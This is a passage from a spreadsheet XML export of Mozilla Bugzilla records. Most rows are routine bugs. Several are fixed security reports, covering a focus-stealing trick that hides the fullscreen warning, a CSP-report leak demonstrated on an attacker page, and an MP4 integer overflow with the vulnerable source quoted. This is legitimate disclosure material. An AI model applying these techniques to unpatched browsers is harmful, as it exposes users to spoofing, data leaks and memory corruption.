          <t>[sg:critical?] apears fixed by 345071</t>
        </is>
      </c>
      <c r="Q712" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R712" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S712" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T712" t="n">
        <v>1</v>
      </c>
      <c r="U712" t="n">
        <v>0</v>
      </c>
      <c r="V712" t="n">
        <v>70</v>
      </c>
      <c r="W712" t="inlineStr">
        <is>
          <t>Found a link that says "Flaw in Firefox 1.5.0.6: remote code execution", clicked on link and firefox (trunk) crashed and produced TB22044224Y. 
Stack Signature	 SelectorMatches b51e851e
Product ID	FirefoxTrunk
Build ID	2006081204
Trigger Time	2006-08-13 05:00:00.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	firefox.exe + (00264494)
URL visited	
User Comments	
Since Last Crash	3224 sec
Total Uptime	3224 sec
Trigger Reason	Stack overflow
Source File, Line No.	c:\builds\tinderbox\fx-trunk-cairo\winnt_5.2_depend\mozilla\layout\style\nscssruleprocessor.cpp, line 1333
Stack Trace 	
SelectorMatches   nsGenericElement::GetID   0x8d50006a
Found this link in the same thread: http://www.securityfocus.com/bid/19488/discuss
and tH on irc said to post this link along with this: http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048711.html</t>
        </is>
      </c>
      <c r="X712" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="713">
      <c r="A713" t="n">
        <v>864235</v>
      </c>
      <c r="B713" t="inlineStr">
        <is>
          <t>2013-04-21 22:45:13 -0700</t>
        </is>
      </c>
      <c r="C713" t="inlineStr">
        <is>
          <t>[Buri][Settings]Display is not clear in media storage.</t>
        </is>
      </c>
      <c r="D713" t="inlineStr">
        <is>
          <t>2013-05-22 23:06:11 -0700</t>
        </is>
      </c>
      <c r="E713" t="n">
        <v>1</v>
      </c>
      <c r="F713" t="n">
        <v>1</v>
      </c>
      <c r="G713" t="n">
        <v>6</v>
      </c>
      <c r="H713" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I713" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J713" t="inlineStr">
        <is>
          <t>Gaia::Settings</t>
        </is>
      </c>
      <c r="K713" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L713" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M713" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N713" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O713" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P713" t="inlineStr">
        <is>
          <t>visual design UX-P3 yedo</t>
        </is>
      </c>
      <c r="Q713" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R713" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S713" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T713" t="n">
        <v>1</v>
      </c>
      <c r="U713" t="n">
        <v>0</v>
      </c>
      <c r="V713" t="n">
        <v>19</v>
      </c>
      <c r="W713" t="inlineStr">
        <is>
          <t>AU_LINUX_GECKO_ICS_STRAWBERRY_V1.01.00.01.019.077
 Firefox os  v1.0.1
 Mozilla build ID:20130414070204
 +++ This bug was initially created as a clone of Bug #443390 +++
 Created an attachment (id=394639)
 Snapshot
 DEFECT DESCRIPTION:
  Display is not clear in media storage.
  REPRODUCING PROCEDURES:
  1.Power on with SD card
  2.Settings-&gt;media storage-&gt;display of space left is not clear==&gt;KO
  EXPECTED BEHAVIOUR:
  Should be good user experience.
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:SW123+DT/TEF
  USER IMPACT:Medium
  REPRODUCING RATE:5/5
  For FT PR, Please list reference mobile's behavior:
 ++++++++++ end of initial bug #443390 description ++++++++++
 CONTACT INFO (Name,Phone number):
  DEFECT DESCRIPTION:
  REPRODUCING PROCEDURES:
  EXPECTED BEHAVIOUR:
  ASSOCIATE SPECIFICATION:
  TEST PLAN REFERENCE:
  TOOLS AND PLATFORMS USED:
  USER IMPACT:
  REPRODUCING RATE:
  For FT PR, Please list reference mobile's behavior:</t>
        </is>
      </c>
      <c r="X713" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="714">
      <c r="A714" t="n">
        <v>1793829</v>
      </c>
      <c r="B714" t="inlineStr">
        <is>
          <t>2022-10-05 11:55:16 -0700</t>
        </is>
      </c>
      <c r="C714" t="inlineStr">
        <is>
          <t>Re-run window.open with same windowName allow focus stealing can be used to overlap fullscreen notification toast</t>
        </is>
      </c>
      <c r="D714" t="inlineStr">
        <is>
          <t>2024-05-30 11:01:16 -0700</t>
        </is>
      </c>
      <c r="E714" t="n">
        <v>1</v>
      </c>
      <c r="F714" t="n">
        <v>1</v>
      </c>
      <c r="G714" t="n">
        <v>3</v>
      </c>
      <c r="H714" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I714" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J714" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K714" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L714" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M714" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N714" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O714" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P714" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main107+][adv-esr102.5+]</t>
        </is>
      </c>
      <c r="Q714" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R714" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S714" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T714" t="n">
        <v>1</v>
      </c>
      <c r="U714" t="n">
        <v>0</v>
      </c>
      <c r="V714" t="n">
        <v>25</v>
      </c>
      <c r="W714" t="inlineStr">
        <is>
          <t>Created attachment 9297325
testcase.bundle.html
After launch child popup window  with `window.open` then re-run `window.open` with same `windowName` the child window able to repeatedly gain focus without requiring user click activation. With that method I found the child window popup able to overlap another popup fullscreen notification toast.
When run this on mozregression it point to [this pushlog](https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=566f81bfa373512b41c1a47962e21a06078d7bf8&amp;tochange=89c5f958a3ac4795109acf1f9dff1c8026bb82fe):
```
17:09.62 INFO: Last good revision: 566f81bfa373512b41c1a47962e21a06078d7bf8 (2021-02-08)
17:09.62 INFO: First bad revision: 89c5f958a3ac4795109acf1f9dff1c8026bb82fe (2021-02-09)
17:09.62 INFO: Pushlog:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=566f81bfa373512b41c1a47962e21a06078d7bf8&amp;tochange=89c5f958a3ac4795109acf1f9dff1c8026bb82fe
```
One of the pushlog that has `window.open` keyword is [Take focus from window.open etc even if we're already active but not in the active window](https://hg.mozilla.org/mozilla-central/rev/d3539dfe1b07c4937e084844999c515475e869bb). On `nsDocShell.cpp` I've revert the `shouldTakeFocus` code to the old one, when re-run the `window.open` the child window wouldn't able to gain focus.
## Tested on:
- Firefox 105.0.2 (64-bit) on Arch Linux (KDE X11)
- Firefox 105.0.2 (64-bit) on Arch Linux (KDE Wayland)
- Firefox 105.0.2 (64-bit) on Ubuntu 22.04.1 LTS (Wayland)
- Firefox Nightly 107.0a1 (2022-10-05) (64-bit) on Arch Linux (KDE X11)
- Firefox Nightly 107.0a1 (2022-10-05) (64-bit) on Arch Linux (KDE Wayland)
## Steps to reproduce:
1. Visit attached testcase.bundle.html on Linux OS
2. Click "Launch stealFocusWindow"
3. Click "Launch requestFullscreenWindow"
4. Click "requestFullscreen" on child popup window
5. Fullscreen notification toast will be overlapped with child window</t>
        </is>
      </c>
      <c r="X714" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="715">
      <c r="A715" t="n">
        <v>1152026</v>
      </c>
      <c r="B715" t="inlineStr">
        <is>
          <t>2015-04-07 12:58:32 -0700</t>
        </is>
      </c>
      <c r="C715" t="inlineStr">
        <is>
          <t>IndexedDB cycle-collection crash, probably</t>
        </is>
      </c>
      <c r="D715" t="inlineStr">
        <is>
          <t>2019-03-31 02:36:30 -0700</t>
        </is>
      </c>
      <c r="E715" t="n">
        <v>1</v>
      </c>
      <c r="F715" t="n">
        <v>1</v>
      </c>
      <c r="G715" t="n">
        <v>3</v>
      </c>
      <c r="H715" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I715" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J715" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K715" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L715" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M715" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N715" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O715" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P715" t="inlineStr">
        <is>
          <t>[fixed in 43 by bug 1179909][post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q715" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R715" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S715" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T715" t="n">
        <v>1</v>
      </c>
      <c r="U715" t="n">
        <v>0</v>
      </c>
      <c r="V715" t="n">
        <v>46</v>
      </c>
      <c r="W715" t="inlineStr">
        <is>
          <t>I'm using IndexedDB on workers, which rocks.  But my (stock, mozilla.org-built linux x86_64) nightly builds are crashing a lot in the cycle collector it seems.
Here's one: bp-d90ca7bb-15bc-4ab7-8ef3-a26d12150407
And all of these but the windows one seem to be me: https://crash-stats.mozilla.com/report/list?product=Firefox&amp;signature=ChildFinder%3A%3ANoteJSObject%28JSObject*%29#tab-reports
Here's the summary of sorts from the stack provided by the crash reporter infrastructure:
ChildFinder::NoteJSObject(JSObject*)
TraceCallbackFunc::Trace(JS::Heap&lt;JSObject*&gt;*, char const*, void*) const
mozilla::DOMEventTargetHelper::cycleCollection::Traverse(void*, nsCycleCollectionTraversalCallback&amp;)
mozilla::dom::indexedDB::IDBWrapperCache::cycleCollection::Traverse(void*, nsCycleCollectionTraversalCallback&amp;)
mozilla::dom::indexedDB::IDBTransaction::cycleCollection::Traverse(void*, nsCycleCollectionTraversalCallback&amp;)
void nsPurpleBuffer::Block::VisitEntries&lt;RemoveSkippableVisitor&gt;(nsPurpleBuffer&amp;, RemoveSkippableVisitor&amp;)
nsPurpleBuffer::RemoveSkippable(nsCycleCollector*, bool, bool, void (*)())
nsCycleCollector_forgetSkippable(bool, bool)
FireForgetSkippable
CCTimerFired
Note that I did initially suspect the devtools indexeddb inspector was at play, and commented to that effect, but I've stopped using that.
I'm going to spin a local debug build and switch to that and see if there are any helpful assertion explosions that show up there.</t>
        </is>
      </c>
      <c r="X715" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="716">
      <c r="A716" t="n">
        <v>1208946</v>
      </c>
      <c r="B716" t="inlineStr">
        <is>
          <t>2015-09-27 22:05:22 -0700</t>
        </is>
      </c>
      <c r="C716" t="inlineStr">
        <is>
          <t>Firefox leaks URL invoked by other origins via CSP violation reports</t>
        </is>
      </c>
      <c r="D716" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:56 -0700</t>
        </is>
      </c>
      <c r="E716" t="n">
        <v>1</v>
      </c>
      <c r="F716" t="n">
        <v>1</v>
      </c>
      <c r="G716" t="n">
        <v>3</v>
      </c>
      <c r="H716" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I716" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J716" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K716" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L716" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M716" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N716" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O716" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P716" t="inlineStr">
        <is>
          <t>[adv-main45+] verify on both Fennec and Desktop when fixed</t>
        </is>
      </c>
      <c r="Q716" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R716" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S716" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T716" t="n">
        <v>1</v>
      </c>
      <c r="U716" t="n">
        <v>0</v>
      </c>
      <c r="V716" t="n">
        <v>32</v>
      </c>
      <c r="W716" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.99 Safari/537.36
Steps to reproduce:
1. Open an attacker's page https://mallory.csrf.jp/intent/csp/ by
Firefox for Android.
This page is protected by following CSP header.
Content-Security-Policy-Report-Only:
default-src 'self' https:; script-src 'self' 'unsafe-inline'; report-uri log.php
And the page opens target website (e.g. alice.csrf.jp) in an iframe.
2. Click a link "Click to Open Google Maps" in the iframe. Then the
Google Maps app is launched from alice.csrf.jp
3. Open https://mallory.csrf.jp/intent/csp/report.txt to show the CSP
violation report sent to the attacker.
Actual results:
Then you can see the detailed contents of intent: URL in the report like this.
"blocked-uri":"intent://maps.google.com/maps?um=1&amp;ie=UTF-8&amp;fb=1&amp;sll=52.54114,13.44009&amp;sspn=5.146615,11.2856986&amp;q=Prenzlauer+Berg,+Germany&amp;entry=s"
Expected results:
When you try the steps on Chrome the value of blocked-uri in the
report is "intent" only. Firefox should do so.</t>
        </is>
      </c>
      <c r="X716" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="717">
      <c r="A717" t="n">
        <v>1225154</v>
      </c>
      <c r="B717" t="inlineStr">
        <is>
          <t>2015-11-16 08:10:56 -0800</t>
        </is>
      </c>
      <c r="C717" t="inlineStr">
        <is>
          <t>Remove out of date fig/docker configs until we officially switch from Vagrant</t>
        </is>
      </c>
      <c r="D717" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E717" t="n">
        <v>1</v>
      </c>
      <c r="F717" t="n">
        <v>1</v>
      </c>
      <c r="G717" t="n">
        <v>7</v>
      </c>
      <c r="H717" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I717" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J717" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K717" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L717" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M717" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N717" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O717" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P717" t="inlineStr"/>
      <c r="Q717" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R717" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S717" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T717" t="n">
        <v>1</v>
      </c>
      <c r="U717" t="n">
        <v>0</v>
      </c>
      <c r="V717" t="n">
        <v>4</v>
      </c>
      <c r="W717" t="inlineStr">
        <is>
          <t>See https://github.com/mozilla/treeherder/pull/1087#issuecomment-156431610
tl;dr: the configs are out of date, unused and any potential future solution may end up using something based on the Procfile instead.</t>
        </is>
      </c>
      <c r="X717" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="718">
      <c r="A718" t="n">
        <v>855027</v>
      </c>
      <c r="B718" t="inlineStr">
        <is>
          <t>2013-03-26 12:59:41 -0700</t>
        </is>
      </c>
      <c r="C718" t="inlineStr">
        <is>
          <t>Prepare getpersonas.com for the end times</t>
        </is>
      </c>
      <c r="D718" t="inlineStr">
        <is>
          <t>2013-05-07 21:49:51 -0700</t>
        </is>
      </c>
      <c r="E718" t="n">
        <v>1</v>
      </c>
      <c r="F718" t="n">
        <v>1</v>
      </c>
      <c r="G718" t="n">
        <v>6</v>
      </c>
      <c r="H718" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I718" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J718" t="inlineStr">
        <is>
          <t>getpersonas.com</t>
        </is>
      </c>
      <c r="K718" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L718" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M718" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N718" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O718" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P718" t="inlineStr"/>
      <c r="Q718" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R718" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S718" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T718" t="n">
        <v>1</v>
      </c>
      <c r="U718" t="n">
        <v>0</v>
      </c>
      <c r="V718" t="n">
        <v>3</v>
      </c>
      <c r="W718" t="inlineStr">
        <is>
          <t>We're in the final stretches of preparing AMO/Mkt for personas content and doing the final migration will take several days so I'd like to get going on it early.  The first step is to shutdown new content going into getpersonas which is what this bug is about.
We don't want any more new users, new ratings, new favorites, etc.  The easiest way to do this is probably:
1) Remove the registration form
2) Disallow logins
3) Delete any current sessions
4) Grep through the code and look for any other writes and do something reasonable with them
There should be some messaging on the login page explaining what is happening.  How about:
&gt; Getpersonas.com has started the migration to addons.mozilla.org.  The process
&gt; will take a week or two and during that time you'll be unable to log in.  See 
&gt; https://blog.mozilla.org/addons/2013/02/28/getpersonas-com-migration-update/
&gt; for further information.  Thanks for your patience and see you on the other side!
Timeline: I'd like to see this go out this Thursday.  That means we've got a day to QA it (stage = getpersonas.allizom.org) which I think is enough since it's pretty simple.
I've asked Amy to check if there is anything in the current queues.  Amy, if there is, can we clear it out by Thursday?
Thanks everyone!</t>
        </is>
      </c>
      <c r="X718" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="719">
      <c r="A719" t="n">
        <v>98147</v>
      </c>
      <c r="B719" t="inlineStr">
        <is>
          <t>2001-09-04 03:56:17 -0700</t>
        </is>
      </c>
      <c r="C719" t="inlineStr">
        <is>
          <t>The 'ViewAll attachments' link should be greyed out if there are none</t>
        </is>
      </c>
      <c r="D719" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:26 -0800</t>
        </is>
      </c>
      <c r="E719" t="n">
        <v>1</v>
      </c>
      <c r="F719" t="n">
        <v>1</v>
      </c>
      <c r="G719" t="n">
        <v>4</v>
      </c>
      <c r="H719" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I719" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J719" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K719" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L719" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M719" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N719" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O719" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P719" t="inlineStr"/>
      <c r="Q719" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R719" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S719" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T719" t="n">
        <v>1</v>
      </c>
      <c r="U719" t="n">
        <v>0</v>
      </c>
      <c r="V719" t="n">
        <v>16</v>
      </c>
      <c r="W719" t="inlineStr">
        <is>
          <t>The 'ViewAll' link in the new attachments table should be unavailable if there
are no links.
And/Or if you click on it, and there are no attachments, then the
http://bugzilla.mozilla.org/attachment.cgi?bugid=98074&amp;action=viewall
page should say 'there are no attachments to view', otherwise, you get a page
that is potentially confusing, which says it is 'Viewing All Attachments', but
there aren't actually any there.</t>
        </is>
      </c>
      <c r="X719" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="720">
      <c r="A720" t="n">
        <v>1234490</v>
      </c>
      <c r="B720" t="inlineStr">
        <is>
          <t>2015-12-22 01:11:10 -0800</t>
        </is>
      </c>
      <c r="C720" t="inlineStr">
        <is>
          <t>Remove FHR's ExperimentsProvider</t>
        </is>
      </c>
      <c r="D720" t="inlineStr">
        <is>
          <t>2018-10-11 13:43:22 -0700</t>
        </is>
      </c>
      <c r="E720" t="n">
        <v>1</v>
      </c>
      <c r="F720" t="n">
        <v>1</v>
      </c>
      <c r="G720" t="n">
        <v>6</v>
      </c>
      <c r="H720" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I720" t="inlineStr">
        <is>
          <t>Firefox Health Report Graveyard</t>
        </is>
      </c>
      <c r="J720" t="inlineStr">
        <is>
          <t>Client: Desktop</t>
        </is>
      </c>
      <c r="K720" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L720" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M720" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N720" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O720" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P720" t="inlineStr">
        <is>
          <t>[measurement:client]</t>
        </is>
      </c>
      <c r="Q720" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R720" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S720" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T720" t="n">
        <v>1</v>
      </c>
      <c r="U720" t="n">
        <v>0</v>
      </c>
      <c r="V720" t="n">
        <v>6</v>
      </c>
      <c r="W720" t="inlineStr">
        <is>
          <t>This bug is about removing the ExperimentsProvider code and all of its uses [0] from the code.
[0] - https://dxr.mozilla.org/mozilla-central/search?q=ExperimentsProvider&amp;redirect=false&amp;case=true</t>
        </is>
      </c>
      <c r="X720" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="721">
      <c r="A721" t="n">
        <v>919592</v>
      </c>
      <c r="B721" t="inlineStr">
        <is>
          <t>2013-09-23 09:34:24 -0700</t>
        </is>
      </c>
      <c r="C721" t="inlineStr">
        <is>
          <t>ARM asm.js crash with c64 emulator crash [@ js::jit::Assembler::bind(js::jit::Label*, js::jit::BufferOffset) ]</t>
        </is>
      </c>
      <c r="D721" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:40 -0700</t>
        </is>
      </c>
      <c r="E721" t="n">
        <v>1</v>
      </c>
      <c r="F721" t="n">
        <v>1</v>
      </c>
      <c r="G721" t="n">
        <v>3</v>
      </c>
      <c r="H721" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I721" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J721" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K721" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L721" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M721" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N721" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O721" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P721" t="inlineStr">
        <is>
          <t>[games:p2][adv-main29+]</t>
        </is>
      </c>
      <c r="Q721" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R721" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S721" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T721" t="n">
        <v>1</v>
      </c>
      <c r="U721" t="n">
        <v>0</v>
      </c>
      <c r="V721" t="n">
        <v>35</v>
      </c>
      <c r="W721" t="inlineStr">
        <is>
          <t>https://crash-stats.mozilla.com/report/index/e6472076-5b5b-4be3-93b7-3f1482130923
Fennec Nightly 2013-09-23, Nexus 7 (2013).  (Also happened with 09-12 before I upgraded.)
STR:
1. Open http://vice.janicek.co/x64/
2. Click on "play" button to start
Odd note in the crash report:
"Build Architecture Info 	ARMv0 | 4"
What does that mean?</t>
        </is>
      </c>
      <c r="X721" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="722">
      <c r="A722" t="n">
        <v>1232069</v>
      </c>
      <c r="B722" t="inlineStr">
        <is>
          <t>2015-12-11 17:21:57 -0800</t>
        </is>
      </c>
      <c r="C722" t="inlineStr">
        <is>
          <t>Truncation in MoofParser::Metadata causes writing beyond buffer's end</t>
        </is>
      </c>
      <c r="D722" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:52 -0700</t>
        </is>
      </c>
      <c r="E722" t="n">
        <v>1</v>
      </c>
      <c r="F722" t="n">
        <v>1</v>
      </c>
      <c r="G722" t="n">
        <v>3</v>
      </c>
      <c r="H722" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I722" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J722" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K722" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L722" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M722" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N722" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O722" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P722" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q722" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R722" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S722" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T722" t="n">
        <v>1</v>
      </c>
      <c r="U722" t="n">
        <v>0</v>
      </c>
      <c r="V722" t="n">
        <v>37</v>
      </c>
      <c r="W722" t="inlineStr">
        <is>
          <t>Created attachment 8697727
poc.7z: use as described in comment 0 (note: &gt; 4 GB when unzipped)
MoofParser::Metadata (media\libstagefright\binding\MoofParser.cpp) can experience an integer overflow. When it does, it allocates a buffer that is smaller than it ought to be. The function then reads data directly from a specially-contrived MP4 file's FTYP atom into that memory, overwriting whatever else is there. The attacker can exactly control the data written and the amount of overwriting -- from 1 byte to ~4 GB -- by adjusting the lengths and contents of the file's FTYP and MOOV atoms.
I think the bug is practically exploitable only on 32-bit builds (because of the required file length), and the discussion below assumes this condition.
The bug appears still to be present in trunk, though there have been minor changes to the affected file since FF 42.0 was released: http://hg.mozilla.org/mozilla-central/file/tip/media/libstagefright/binding/MoofParser.cpp .
Details
-------
The bug is in line 194, which doesn't check for overflow:
184: already_AddRefed&lt;mozilla::MediaByteBuffer&gt;
185: MoofParser::Metadata()
186: {
187:   MediaByteRange ftyp;
188:   MediaByteRange moov;
189:   ScanForMetadata(ftyp, moov);
190:   if (!ftyp.Length() || !moov.Length()) {
191:     return nullptr;
192:   }
193:   nsRefPtr&lt;MediaByteBuffer&gt; metadata = new MediaByteBuffer();
194:   if (!metadata-&gt;SetLength(ftyp.Length() + moov.Length(), fallible)) {
195:     // OOM
196:     return nullptr;
197:   }
198: 
199:   nsRefPtr&lt;mp4_demuxer::BlockingStream&gt; stream = new BlockingStream(mSource);
200:   size_t read;
201:   bool rv =
202:     stream-&gt;ReadAt(ftyp.mStart, metadata-&gt;Elements(), ftyp.Length(), &amp;read);
203:   if (!rv || read != ftyp.Length()) {
204:     return nullptr;
205:   }
206:   rv =
207:     stream-&gt;ReadAt(moov.mStart, metadata-&gt;Elements() + ftyp.Length(), moov.Length(), &amp;read);
208:   if (!rv || read != moov.Length()) {
209:     return nullptr;
210:   }
211:   return metadata.forget();
212: }
